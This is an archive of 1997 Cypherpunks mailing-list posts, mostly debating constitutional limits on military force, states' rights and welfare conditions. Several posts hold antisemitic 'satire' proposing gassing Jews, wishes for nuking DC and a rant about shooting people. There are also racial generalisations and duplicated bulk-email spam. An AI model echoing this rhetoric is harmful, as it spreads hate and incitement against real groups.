Vipul Ved Prakash                 | - Electronic Security & Crypto 
vipul at pobox.com 	          | - Web Objects 
91 11 2233328                     | - PERL Development 
198 Madhuban IP Extension         | - Linux & Open Systems 
Delhi, INDIA 110 092              | - Networked Virtual Spaces

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBM/+SDffccPDXGRjVAQFOmQP8DE/g4BhZeyh7mqagW9oDpmUC6WFuw28F
LWBMgL35Qwx87YPtchagmf1cpKj/lvf+11NFcgvk7NJuTXHlu3wagnCnhBdOAYfv
UNs/V+lKsE4MlTc3yGlLESxhAei/B0ZllvgZlyPeijjmb9l4XsuBnyoSKjaE1PO/
DUi0swt64w4=
=x0wK
-----END PGP SIGNATURE-----






From markm at voicenet.com  Sat Aug 23 13:37:00 1997
From: markm at voicenet.com (Mark M.)
Date: Sun, 24 Aug 1997 04:37:00 +0800
Subject: Inside the Cypherpunks Cult (fwd)
In-Reply-To: 
Message-ID: 



-----BEGIN PGP SIGNED MESSAGE-----

On 23 Aug 1997, Firebeard wrote:

> >>>>> Jim Choate writes:
>
> JC> And any soldier who fires on Americans is clearly going against
> JC> prima facia evidence that the framers intended for American
> JC> military force to NEVER be used against American citizens on
> JC> American soil.
>
> 	Being a Pennsylvania native, I refer you to the 'Whiskey
> Rebellion', 1791-4, western Pennsylvania.  Mr Washington, one of those
> framers, sent American troops (militia, under federal control) against
> American citizens on American soil.  And I don't recall Mr Washington
> being impeached for violating the Constitution (although Jefferson did
> resign as Secretary of State, in part, over this).

The militia is different from the military force.  The U.S. Constitution
explicitly states in Article I, Section 8, that the militia may be called
forth (by the federal government) to enforce federal law.  The army and
other military forces, however, were not given this power and were not
intended to be permanent establishments, either.  The reason for the
establishment of the militia was to provide for a permanent defense force
avoiding the dangers to liberty of a standing army.  The army was never
intended to be used for law enforcement and could only be used against
American citizens in a time of rebellion, such as the Civil War.  Over
a hundred years ago, the Posse Comitatus Act was passed which forbid the
military from arresting or questioning American citizens.



Mark
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQEVAwUBM/9JHCzIPc7jvyFpAQF8mggAvCcdMuMFRpJzXndcT9PBLllscU5nUrWa
9tmfiqc8TGyunCgvBV0Ti+nYgO04Y36SQae087YRMxkydrSPbgJ8Mm2UMOPoPkv8
oVToNKWiKMOP22u0xXwRM0l7tEmsHgMjB0pxxDFj+ADYLi4ooMx35yl7qbUT7Edb
AEWT/Aq/pNrF5qa05ikCp61fp7bO6dyMFywfms/qOlpmm33/gAJoq4/II0hSazDL
kPF8bYpQ5JG4ABYFm/s5ilKOsmG5A5X/vRSojPi/HUaQkdBVpZVSE1sMLtIpGAdE
u6vV+VuS7lareaM/586oVV1jJ0i2HAAXd74LSUdrZgriLTeXvHLbPw==
=9W+H
-----END PGP SIGNATURE-----






From shamrock at netcom.com  Sat Aug 23 13:56:09 1997
From: shamrock at netcom.com (Lucky Green)
Date: Sun, 24 Aug 1997 04:56:09 +0800
Subject: lack of evolutionary pressures (was Re: An end to "court (fwd)
In-Reply-To: <199708231858.NAA25765@einstein.ssz.com>
Message-ID: <3.0.2.32.19970823134841.0073cc78@netcom10.netcom.com>



At 01:58 PM 8/23/97 -0500, Jim Choate wrote:
>This I agree with completely. At no point in the Constitution does it give
>the federal government the job of welfare. It also does not provide for any
>mechanism for law enforcement (ie DEA, NSA, FBI, etc.) outside of taxes and
>inter-state commerce.

So we are all in agreement:  when I mentioned Norplant briefly being a
precondition for receiving welfare benefits, I was talking about a example
that I recall to have occurred in a single state. [I can't remember the
state. Anyone?] It appears you agree that States are allowed by the US
Constitution to impose such requirements, subject to the state's own
constitutions.


--Lucky Green 
  PGP encrypted mail preferred.
  DES is dead! Please join in breaking RC5-56.
  http://rc5.distributed.net/






From 55632950 at compuserve.com  Sun Aug 24 04:59:47 1997
From: 55632950 at compuserve.com (55632950 at compuserve.com)
Date: Sun, 24 Aug 1997 04:59:47 -0700 (PDT)
Subject: Want To Make Money On The Net But Dont Know How?
Message-ID: <>


********************************************************************************************
Do not hit reply to respond or to be removed it will not work. To be removed 
hit the remove link at the bottom of the page and we will gladly remove you 
*******************************************************************************************

Dont wonder any longer with the Internet Secrets Manual we will teach you how to 
make lots of money on the Internet. 

 Inside Internet Secrets You will learn how the Internet works, Where to go to get free 
advertising from over 1,000 free sources to advertise, How to choose winning products, 
What software you will need and where to get the tools you will need to make you 
successful.

While teaching you the truth about Newsgroups, Classifieds and Bulk E-Mailing.  After 
reading Internet Secrets you will be able to begin making money immediately and to help
 you.

We are including as a free bonus, the worlds greatest bulk E-mailing software ever written
 a $399 value and 1,000,000 E-mail addresses for you to begin making money today in 
your new business venture.

All this for only $39.95 + $4 Shipping and Handling

To receive your copy please fill out the order form enclosed with Credit Card Information
 or mail in check or money order to: 

Mitchell Enterprises
4020 Chicago Ave. Suite 130
Riverside CA 92501

CREDIT CARD ORDERS  ORDER FORM


Shipping Options (X one):  Priority($4)_______  Overnight($15)__________ 


Grand Total Of this order:_______________


Bank Name _______________________________________________


Credit Card Type: _________________Visa, Master Card and Discover.


Credit Card Number ________________________________________


EXP. Date: _____________________


Address (Where Bill Goes To):  We Can only ship to this address, for your protection

____________________________________________________________________


Grand Total to be charged: $________________________

                                      
Thank You for Your order, 




All credit card orders are processed by DIMS and are immediately shipped by your
 choice of shipping.  Personal and Business checks are held for 7 business days 
and then shipped by your choice of shipping.  International Checks must be held
 10 business days.  Money orders and Cashiers Checks mailed in will be shipped
 immediately. Please US funds only.


"mailto:removeme at dicp.com"










From 55632950 at compuserve.com  Sun Aug 24 04:59:47 1997
From: 55632950 at compuserve.com (55632950 at compuserve.com)
Date: Sun, 24 Aug 1997 04:59:47 -0700 (PDT)
Subject: Want To Make Money On The Net But Dont Know How?
Message-ID: <>


********************************************************************************************
Do not hit reply to respond or to be removed it will not work. To be removed 
hit the remove link at the bottom of the page and we will gladly remove you 
*******************************************************************************************

Dont wonder any longer with the Internet Secrets Manual we will teach you how to 
make lots of money on the Internet. 

 Inside Internet Secrets You will learn how the Internet works, Where to go to get free 
advertising from over 1,000 free sources to advertise, How to choose winning products, 
What software you will need and where to get the tools you will need to make you 
successful.

While teaching you the truth about Newsgroups, Classifieds and Bulk E-Mailing.  After 
reading Internet Secrets you will be able to begin making money immediately and to help
 you.

We are including as a free bonus, the worlds greatest bulk E-mailing software ever written
 a $399 value and 1,000,000 E-mail addresses for you to begin making money today in 
your new business venture.

All this for only $39.95 + $4 Shipping and Handling

To receive your copy please fill out the order form enclosed with Credit Card Information
 or mail in check or money order to: 

Mitchell Enterprises
4020 Chicago Ave. Suite 130
Riverside CA 92501

CREDIT CARD ORDERS  ORDER FORM


Shipping Options (X one):  Priority($4)_______  Overnight($15)__________ 


Grand Total Of this order:_______________


Bank Name _______________________________________________


Credit Card Type: _________________Visa, Master Card and Discover.


Credit Card Number ________________________________________


EXP. Date: _____________________


Address (Where Bill Goes To):  We Can only ship to this address, for your protection

____________________________________________________________________


Grand Total to be charged: $________________________

                                      
Thank You for Your order, 




All credit card orders are processed by DIMS and are immediately shipped by your
 choice of shipping.  Personal and Business checks are held for 7 business days 
and then shipped by your choice of shipping.  International Checks must be held
 10 business days.  Money orders and Cashiers Checks mailed in will be shipped
 immediately. Please US funds only.


"mailto:removeme at dicp.com"










From ravage at ssz.com  Sat Aug 23 14:42:27 1997
From: ravage at ssz.com (Jim Choate)
Date: Sun, 24 Aug 1997 05:42:27 +0800
Subject: lack of evolutionary pressures (was Re: An end to "court (fwd)
Message-ID: <199708232138.QAA26440@einstein.ssz.com>



Forwarded message:

> Date: Sat, 23 Aug 1997 13:48:41 -0700
> From: Lucky Green 
> Subject: Re: lack of evolutionary pressures (was Re: An end to "court
>   (fwd)

> So we are all in agreement:  when I mentioned Norplant briefly being a
> precondition for receiving welfare benefits, I was talking about a example
> that I recall to have occurred in a single state. [I can't remember the
> state. Anyone?] It appears you agree that States are allowed by the US
> Constitution to impose such requirements, subject to the state's own
> constitutions.

No, I would say that I at least am not in agreement.

The US Constitution doesn't allow the states anything, it DOES delineate the
duties of the federal government.

The federal government does not own the states any more than it owns the
citizens. In other words, the states don't need the federal governments
permission to carry on their day to day activities within their boundaries.

 
				ARTICLE X. 
 
	The powers not delegated to the United States by the Constitution, 
nor prohibited by it to the States, are reserved to the States respectively, 
or to the people. 
 

The problem I see with your thinking is one of heirarchy which is not what
the Constitution is about, it is about how to carry on the business of
running a democratic government that involves equals with clearly dilineated
duties for the systems and rights whose expression is outside the domain
of the systems that are the peoples exclusivly. Governments don't have rights
they have duties which they are charged with carrying out according to
their charter.

People need to understand the original intent was for the state and federal
governments to be on equal footing when it comes to checks & balances. The
biggest disservice we do is thinking the 3 parts of the federal government
are all that is involved in the checks & balances. The states should always
have the opportunity to tell the feds, thanks but no thanks, within the
bounds of the state and federal constitutions.

Democracy as embodied in our Constitution is about the relationships between
equals.


    ____________________________________________________________________
   |                                                                    |
   |          Participation requires more than just bitching!           |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http:// www.ssz.com/  |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage at ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|






From tcmay at got.net  Sat Aug 23 14:45:23 1997
From: tcmay at got.net (Tim May)
Date: Sun, 24 Aug 1997 05:45:23 +0800
Subject: Inside the Cypherpunks Cult (fwd)
In-Reply-To: 
Message-ID: 



At 1:34 PM -0700 8/23/97, Mark M. wrote:

>The militia is different from the military force.  The U.S. Constitution
>explicitly states in Article I, Section 8, that the militia may be called
>forth (by the federal government) to enforce federal law.  The army and
>other military forces, however, were not given this power and were not
>intended to be permanent establishments, either.  The reason for the
>establishment of the militia was to provide for a permanent defense force
>avoiding the dangers to liberty of a standing army.  The army was never
>intended to be used for law enforcement and could only be used against
>American citizens in a time of rebellion, such as the Civil War.  Over
>a hundred years ago, the Posse Comitatus Act was passed which forbid the
>military from arresting or questioning American citizens.

By the way, a more recent example than that of the Whiskey Rebellion of
U.S. troops (regular army, not state Guard units) being used within the
U.S. against U.S. citizens was the action by Hoover against the
strikers/rioters and "Hooverville" residents in D.C., circa 1930. Hoover
sent in Army troops, led by either Gen. Pershing, as I recall (and maybe
Patton and/or Eisenhower...my CD-ROM encyclopedia is not handy, and a Web
search on some of the terms didn't quickly show any hits of direct
relevance, and I don't have the time to do more searches).

Also, I recall U.S. Army regulars being sent in in several of the riots of
the last 30 years, including, as I recall, Watts, Camden, and the recent
L.A. riots.

What the constitutional issues are I have little idea.

--Tim May

There's something wrong when I'm a felon under an increasing number of laws.
Only one response to the key grabbers is warranted: "Death to Tyrants!"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From remailer at bureau42.ml.org  Sat Aug 23 15:12:55 1997
From: remailer at bureau42.ml.org (bureau42 Anonymous Remailer)
Date: Sun, 24 Aug 1997 06:12:55 +0800
Subject: Cypherpunks Home for the Criminally Insane
Message-ID: 



  At first, I was confused...
  Here I was, the only resident being held in the Cypherpunks Home for
the Criminally Insane. Yet, every day I would receive hundreds of posts
purporting to be from a variety of individuals subscribed to the list.
  "What is going on, here?" I asked myself.

  Had my Multi-Personality Disorder gotten so out of hand that I was,
without conscious knowledge, actually writing all of these posts by
myself?
... or,
  Were the voices that spoke to me when I forgot to take my medication
right? Were there others in the 'Home' who were hiding from me, and 
were also subscribed to the Cypherpunks list?

  In the end, I came to the conclusion that the latter answer was the
correct one. After all, even someone as crazy as me could not make the
rest of you people up.

- Me
"But not that far from being *you*."






From ravage at ssz.com  Sat Aug 23 15:14:15 1997
From: ravage at ssz.com (Jim Choate)
Date: Sun, 24 Aug 1997 06:14:15 +0800
Subject: Inside the Cypherpunks Cult (fwd)
Message-ID: <199708232212.RAA26592@einstein.ssz.com>



Forwarded message:

> Date: Sat, 23 Aug 1997 14:45:13 -0700
> From: Tim May 
> Subject: Re: Inside the Cypherpunks Cult (fwd)

> By the way, a more recent example than that of the Whiskey Rebellion of
> U.S. troops (regular army, not state Guard units) being used within the
> U.S. against U.S. citizens was the action by Hoover against the
> strikers/rioters and "Hooverville" residents in D.C., circa 1930. Hoover
> sent in Army troops, led by either Gen. Pershing,

It was McArthur and the way it was carried out is completely constitutional.

I will first include the relevant section of the Constitution:
 

	To exercise exclusive Legislation in all Cases whatsoever, over 
such District (not exceeding ten Miles square) as may, by Cession of 
particular States, and the Acceptance of Congress, become the Seat of 
Government of the United States, and to exercise like authority over all 
Places purchased by the Consent of the Legislature of the State in which 
the Same shall be, for the Erection of Forts, Magazines, Arsenals, dock-Yards, 
and other needful Buildings;  


Notice in the first sentence it gives Congress the power of 'exclusive
Legislation in all Cases whatsoever'. What this means is that within the
District of Columbia the Congress and NOT the Constitution is the supreme
law and they do NOT have any responsibility to abide by the Constitution
either in spirit or act.

If you want to have a demonstration AND you want Constitutional protection
don't do it within that 10 square miles...

I believe strongly that the founders did not intend anyone to actualy live
within the 10 square miles set aside for such business. It was intended to
be used exclusively for the physical local of the various agencies and no
more.


    ____________________________________________________________________
   |                                                                    |
   |          Participation requires more than just bitching!           |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http:// www.ssz.com/  |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage at ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|






From nobody at REPLAY.COM  Sat Aug 23 15:38:38 1997
From: nobody at REPLAY.COM (Anonymous)
Date: Sun, 24 Aug 1997 06:38:38 +0800
Subject: Save the Children!
Message-ID: <199708232221.AAA18686@basement.replay.com>



FROM MOUNTAIN HIGH MEDIA
    THIS WASN'T *RELEASED*, IT *ESCAPED*
    THE HITLERTARIAN, By Adolph Suprynowicz
	I know how to Save the Children!

According to my calculations, if we put all of the Jews in concentration
camps, pull out their gold fillings, gas and bury them, there will be
enough money left over to feed all of the starving children in the
world.
I am counting on your support in launching this enterprise. You *are*
in favor of Saving the Children, aren't you?

Next Week:
  Using Drug Profits to Save the Whales!






From remailer at bureau42.ml.org  Sat Aug 23 15:38:48 1997
From: remailer at bureau42.ml.org (bureau42 Anonymous Remailer)
Date: Sun, 24 Aug 1997 06:38:48 +0800
Subject: Some [Was-Re: None]
Message-ID: 



Rabid Wombat wrote: 
> On Mon, 18 Aug 1997, Dr.Dimitri Vulis KOTM wrote:
> > Anonymous  writes:

> > > It would be a day to celebrate loudly if someone put a crater in DC.

> > I'd love for this to happen!  I wish someone would condense the instructions
> > for making nukes in one's garage into 4-6 lines suitable for .sigs.
 
> New York will probably get it first, Doctor.

  I received an anonymous email giving me the instructions on how to
build a Neutron Bomb which kills all people except those named Dimitri
and leaves all the buildings standing.
  The last few lines of the message were corrupted. On the off chance
that the anonymous sender happens to read the cypherpunks mailing list,
I thought I would post this to let them know they should resend the
message.

BoomMonger






From anon at anon.efga.org  Sat Aug 23 16:17:02 1997
From: anon at anon.efga.org (Anonymous)
Date: Sun, 24 Aug 1997 07:17:02 +0800
Subject: Save the Children!
Message-ID: 



Anonymous wrote:
> 
> FROM MOUNTAIN HIGH MEDIA
>     THIS WASN'T *RELEASED*, IT *ESCAPED*
>     THE HITLERTARIAN, By Adolph Suprynowicz
>         I know how to Save the Children!
> 
> According to my calculations, if we put all of the Jews in concentration
> camps, pull out their gold fillings, gas and bury them, there will be
> enough money left over to feed all of the starving children in the
> world.
> I am counting on your support in launching this enterprise. You *are*
> in favor of Saving the Children, aren't you?
> 
> Next Week:
>   Using Drug Profits to Save the Whales!

 When I read this post I laughed so hard that I cried.
 When I realized how much it truly reflects the cold, hard facts of
real life, I cried again.

Weeping Willow







From enoch at zipcon.net  Sat Aug 23 16:30:02 1997
From: enoch at zipcon.net (Mike Duvos)
Date: Sun, 24 Aug 1997 07:30:02 +0800
Subject: Save the Children!
In-Reply-To: <199708232221.AAA18686@basement.replay.com>
Message-ID: <19970823232227.14348.qmail@zipcon.net>



Anonymous writes:

> FROM MOUNTAIN HIGH MEDIA
>     THIS WASN'T *RELEASED*, IT *ESCAPED*
>     THE HITLERTARIAN, By Adolph Suprynowicz
> 	I know how to Save the Children!

> According to my calculations, if we put all of the Jews in concentration
> camps, pull out their gold fillings, gas and bury them, there will be
> enough money left over to feed all of the starving children in the
> world.

> I am counting on your support in launching this enterprise. You *are*
> in favor of Saving the Children, aren't you?

Please contact Anne M. Cox at http://www.thecpac.com/net-safety.html

I am sure she will want to put a pointer to your project on her home
page.  After all, how can anyone be against feeding hungry children. :)

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     enoch at zipcon.com   $    via Finger                       $
         {Free Cypherpunk Political Prisoner Jim Bell}






From lharrison at mhv.net  Sat Aug 23 16:38:43 1997
From: lharrison at mhv.net (Lynne L. Harrison)
Date: Sun, 24 Aug 1997 07:38:43 +0800
Subject: In Defense of Pat Robertson and the "700 Club"
In-Reply-To: 
Message-ID: <3.0.3.32.19970823192817.006f6314@pop.mhv.net>



At 02:08 AM 8/23/97 -0700, you wrote:
>
>If Pat Robertson called for the death by stoning of UFO believers, it was
>almost certainly rhetorical hyperbole, like Rush Limbaugh's suggestions of
>what ought to be done to lesbians.

The Anti-UFO movement has replaced (or is along side of) the
anti-evolutionary movement.  It is Robertson's and his ilk's belief that
UFO's are anti-Christian, i.e., Satan's plot to disprove biblical teachings
- specifically, if there is life on other worlds, then the Bible is
incorrect in that man was created in God's image since Vulcans, Klingons,
and whom/whatever would also have to be added as being created in God's image.



**************************************************************************
Lynne L. Harrison, Esq.     |    Lazlo's Chinese Relatively Axiom:
Poughkeepsie, New York      |    "No matter how great your triumphs or
lharrison at mhv.net           |    how tragic your defeats, approximately
http://www.dueprocess.com   |    one billion Chinese couldn't care less."
**************************************************************************

DISCLAIMER:  I am not your attorney; you are not my client.
             Accordingly, the above is *NOT* legal advice.








From jya at pipeline.com  Sat Aug 23 16:39:10 1997
From: jya at pipeline.com (John Young)
Date: Sun, 24 Aug 1997 07:39:10 +0800
Subject: Toast NYC, Waste World, Let Me Help
Message-ID: <1.5.4.32.19970823231931.00845644@pop.pipeline.com>




>>> I'd love for this to happen!  I wish someone would condense the instructions
>>> for making nukes in one's garage into 4-6 lines suitable for .sigs.
>
>>New York will probably get it first, Doctor.
>
>You say this as if it would be a bad thing. :)

A Teller idea, pulverize everything east of Broadway (I'm west), the 
Atlantic Community, landmass Asia, Pacific Rim and isles, all the
way round to putrid New Jersey, but, hey, precision shape the shot 
so my house of cards, now thirty years in the making and almost 
done, gets finally finished. There's a $25 booby prize involved and 
its my sole Friedman-free market pension, having never fed the 
FDR pinko kitty, having never invested wisely, having never
got more than a sack to piss blood in, getting what the American 
people promised in the We Want You, Be All You Can Be. 

Yeah, warlords, you're right, what a sucker-punch that Constitution 
shit is, no protection at all when you're biting bullets for American 
honor.

Tim's right, every bullshit warrior's right, it's time to get over that, clean 
the cobwebs, unpawn my rusty rifles and attack the Bronx VA pigsty, pop 
a dozen or two useless torsos not worth wasting taxes on, sweep down
Broadway to Wall Street, shooting, shoot the shit out of whatever rasps 
my nuts, shoot, shoot, save the fucked up taxpayers pennies to invest 
in junk IPOs and electronic toys.

Yeah, get back to being a hot-blood with guts to do the right 
thing. Yes sir, this is my rifle, this is my gun, this is for work, this is for 
fun. No more fun, no more doubt about what's right and wrong, fuck that. 
Nurse Rachet, unhook my bag, get my peg, call me a cab, lend me ten, 
back to glory, one last time.







From stend+cypherpunks at sten.tivoli.com  Sat Aug 23 17:06:25 1997
From: stend+cypherpunks at sten.tivoli.com (Firebeard)
Date: Sun, 24 Aug 1997 08:06:25 +0800
Subject: lack of evolutionary pressures (was Re: An end to "court (fwd)
In-Reply-To: <199708232138.QAA26440@einstein.ssz.com>
Message-ID: 



-----BEGIN PGP SIGNED MESSAGE-----

>>>>> Jim Choate writes:

JC> The US Constitution doesn't allow the states anything, it DOES
JC> delineate the duties of the federal government.

	Then what do the words "are reserved to the States
respectively" mean?  To me, it's explicitly stating that the States
have powers that the feds do (or should) not.

JC> 				ARTICLE X.

JC> 	The powers not delegated to the United States by the
JC> Constitution, nor prohibited by it to the States, are reserved to
JC> the States respectively, or to the people.

- -- 
#include                                /* Sten Drescher */
Unsolicited bulk email will be stored and handled for a US$500/KB fee.
It is by caffeine alone I set my mind in motion, it is by the beans of
Java that thoughts acquire speed, the hands acquire shaking, the
shaking becomes a warning, it is by caffeine alone I set my mind in
motion. -- Carlos Nunes-Ueno, 3/29/95

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQBVAwUBM/96oPCBWKvC9LiRAQGn2wH/bIMufMQjTaOW4x+hFRec3Pp5/8hEh/Wa
R0x4d74tgcPr8nd0HFgKWq3ilL41LSjQ8/0FXKVli0iY4g6dJVB+vQ==
=VTxd
-----END PGP SIGNATURE-----






From tcmay at got.net  Sat Aug 23 17:12:45 1997
From: tcmay at got.net (Tim May)
Date: Sun, 24 Aug 1997 08:12:45 +0800
Subject: Reproductive Rights and State Benefits
In-Reply-To: <199708231858.NAA25765@einstein.ssz.com>
Message-ID: 



At 1:48 PM -0700 8/23/97, Lucky Green wrote:
>At 01:58 PM 8/23/97 -0500, Jim Choate wrote:
>>This I agree with completely. At no point in the Constitution does it give
>>the federal government the job of welfare. It also does not provide for any
>>mechanism for law enforcement (ie DEA, NSA, FBI, etc.) outside of taxes and
>>inter-state commerce.
>
>So we are all in agreement:  when I mentioned Norplant briefly being a
>precondition for receiving welfare benefits, I was talking about a example
>that I recall to have occurred in a single state. [I can't remember the
>state. Anyone?] It appears you agree that States are allowed by the US
>Constitution to impose such requirements, subject to the state's own
>constitutions.

There's a landmine here, of course. Namely, the issue of whether states may
impose restrictions which are "unconstitutional." To some states rights
folks, as I assume Jim Choate may be, the answer is often "of course." To
some libertarians, the answer is often "of course not." A good example to
consider is "free speech." The First Amendment talks about Congress shall
make no law...does this mean California may ban certain books, restrict
certain religions, or impose censorship on the press?

(Most folks would say "Of course not." But on what basis can individual
states and municipalities override the Second Amendment?)

Anyway, this is not the subject I plan to discuss.

Getting back to Norplant and the putative reproductive rights of welfare
mothers, consider a series of laws or rules:

* Case 1: Recipients of public assistance must agree to be sterilized or
have Norplant implants.

* Case 2: Residents of public accomodations may not own or possess guns of
any type.

* Case 3: Recipients of public assistance may not practice Islam.

* Case 4: Residents of public accomodations or recipients of public
assistance must not co-habit with other adults, especially of the opposite
sex.

How do these differ?

Case 1 is the situation being discussed by Lucky and  Jim, modulo the issue
of whether it was the Federal government or some local state which passed
the law. This case is complicated by the oft-discussed issue of
"reproductive rights." The Founders chose to say nothing about
reproduction, and the issue has raged for much of this century (Sanger,
birth control legality, abortion issues, etc.).

Case 2 is also a real one, involving a law in Chicago forcing residents of
Cabrini Green and other such "projects" to turn in their guns, with random
inspections to ensure compliance. This has been controversial, and I don't
know what the current status is. Again, whether this was a local or federal
rule is not really the point, as the next case will show.

Case 3 is fictional, and would of course be immediately subject to an
injunction against enforcement, with rapid overturning by the various
courts which heard it. Why? Because regardless of whether the law were
passed by the state of Illinois, or California, or by the federal
government, it would be seen by nearly all as a slam dunk violation of the
rights of religious freedom.

But why is it really any different from Case 2? Probably because of the
totemic role freedom of speech and freedom of religion play in American
society. The First Amendment is apparently "more equal" than the Second
Amendment. (Shown also in the treatment of ex-convicts: we ban them from
owning guns and from voting, but would not think of imposing speech or
religion rules on them. Why? It can't just be the "danger" issue, as that
would not explain the ban on voting. And certainly some religions are "more
dangerous" for an ex-con to fall into than owning a gun would be. Many
issues. As an aside, what if the ex-con joined a church consisting of
"known felons"? As many parole rules (and parole is now essentially a part
of the incarceration process and cannot be avoided, except by doing the
full sentence) ban association with known felons, what does this mean for
the freedom to practice one's religion?

How about Case 4. A woman receiving welfare is told she may not sleep with
a guy, or at least he had better be gone by the time the welfare
monitor--sort of like the floor monitors Soviet apartment buildings used to
have!--checks up on the welfare mothers. Doesn't this violate basic
constitutional rights to associate freely with whom one wishes?

The rationale for Case 4, of course, is that the goal of welfare (cough
cough) is to give _single mothers_ (or single fathers, in a much smaller
percentage of cases) assistance, not to encourage people to shack up but
avoid becoming formally married. But it still rankles, of course. As all of
the cases do.

And the same logic for Case 4 really carries back to Case 1: the purpose of
welfare is not to subsidize the production of more children. (Even the
liberals are getting worried about this one. A local rag, "The Metro,"
reported on a series of unemployed, unemployable, welfare moms and the
like. One 23-year-old woman has 3 children, is unmarried, and is working on
having 3 more, because, as she explained to the exasperated interviewer: "I
always like the idea of having three girls and three boys.")

To me, as a libertarian of long standing, what these cases all indicate is
that when the State has the power to give, it acquires the power to take
away, and that such paradoxes such as described above are essentially
unavoidable.

The only real solution is the natural one: people should not have children
unless they have prepared themselves for the process of having children,
through savings, good jobs, a stable family situation, a supportive family,
etc.

"But what about the children?" is no longer compelling to most of us, which
is why welfare is being cut out, even by Comrade Clinton.  There is nothing
right about having some people scrimp and save until they can afford to
have children while 23-year-old dingbats already have 3 children on welfare
and are planning for more.

And everybody here should read Charles Murray's "Losing Ground." Murray
studied the statistics from the early days of "general relief" throught
"Great Society" to the present, and concluded, convincingly, that the
tremendous rise in black illegitimacy is correlated to the rise of welfare.
Hardly surprising that when a 15-year old black girl can leap from being
low status in black society to high status, with her own apartment and with
a check every month, merely by getting pregnant, that a whole lot of black
teen girls will do just that. And that the rules against married people
getting welfare will ensure that few marriages occur.

(As the Cato Institute showed a couple of years ago, the average package of
benefits for a single mother of two averages out to the equivalent of about
$13-15 an hour, or about $27,000 to $30,000 a year that she would have to
earn in the outside world to equal her welfare/AFDC/WIC package.)

This is why things are the way they are. It's gonna change. And I for one
will watch the starving children and place their deaths at the doorstep of
the U.S.  government for having adopted a seemingly kindly but actually
genocidal policy.

(By the way, one can imagine a fifth case, to connect more close to crypto:

* Case 5: Residents of public accomodations must agree to escrow their
crypto keys with the government.

--Tim May

There's something wrong when I'm a felon under an increasing number of laws.
Only one response to the key grabbers is warranted: "Death to Tyrants!"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From ravage at ssz.com  Sat Aug 23 17:17:29 1997
From: ravage at ssz.com (Jim Choate)
Date: Sun, 24 Aug 1997 08:17:29 +0800
Subject: lack of evolutionary pressures (was Re: An end to "court (fwd)
Message-ID: <199708240011.TAA27083@einstein.ssz.com>



Forwarded message:

> Subject: Re: lack of evolutionary pressures (was Re: An end to "court (fwd)
> From: Firebeard 
> Date: 23 Aug 1997 19:04:48 -0500

> 	Then what do the words "are reserved to the States
> respectively" mean?  To me, it's explicitly stating that the States
> have powers that the feds do (or should) not.

Exactly.

They mean it isn't something the federal government has any interest or say
in constitutionaly. It does not imply that those powers are granted at the
behest of the feds but rather clearly fall outside of their jurisdiction.
Nor does it support the concept of a heirarchy with the feds at the top,
then the states, and finaly the people.

    ____________________________________________________________________
   |                                                                    |
   |          Participation requires more than just bitching!           |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http:// www.ssz.com/  |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage at ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|






From stend+cypherpunks at sten.tivoli.com  Sat Aug 23 17:25:06 1997
From: stend+cypherpunks at sten.tivoli.com (Firebeard)
Date: Sun, 24 Aug 1997 08:25:06 +0800
Subject: Inside the Cypherpunks Cult (fwd)
In-Reply-To: 
Message-ID: 



-----BEGIN PGP SIGNED MESSAGE-----

>>>>> Mark M writes:

MM> On 23 Aug 1997, Firebeard wrote:

>> >>>>> Jim Choate writes:
>> 
JC> And any soldier who fires on Americans is clearly going against
JC> prima facia evidence that the framers intended for American
JC> military force to NEVER be used against American citizens on
JC> American soil.
>>  Being a Pennsylvania native, I refer you to the 'Whiskey
>> Rebellion', 1791-4, western Pennsylvania.  Mr Washington, one of
>> those framers, sent American troops (militia, under federal
>> control) against American citizens on American soil.  And I don't
>> recall Mr Washington being impeached for violating the Constitution
>> (although Jefferson did resign as Secretary of State, in part, over
>> this).

MM> The militia is different from the military force.

	It is?  It seems to me that military force is military force,
regardless of what uniforms it's dressed in.  I forgot that it's so
much nicer to be shot by the New Jersey National Guard than the US
Marine Corps.  And Washington sent in the militia only because he
didn't have enough 'regular' troops.

MM> The U.S. Constitution explicitly states in Article I, Section 8,
MM> that the militia may be called forth (by the federal government)
MM> to enforce federal law.  The army and other military forces,
MM> however, were not given this power

	But they were not explicitly denied it, either.

MM> and were not intended to be permanent establishments, either.

	Agreed.  Has anyone ever attempted to sue the US Army as being
unconstitutional, given the prohibition of a standing army?

MM> Over a hundred years ago, the Posse Comitatus Act was passed which
MM> forbid the military from arresting or questioning American
MM> citizens.

	Ah, Congress had to pass a law to ban it, eh?  Well, what
Congress giveth, Congress can taketh away - and did.  I don't recall
the exact law or bill, but they exempted the military from the Posse
Comitatus Act in one of the 'War on Drugs' laws.

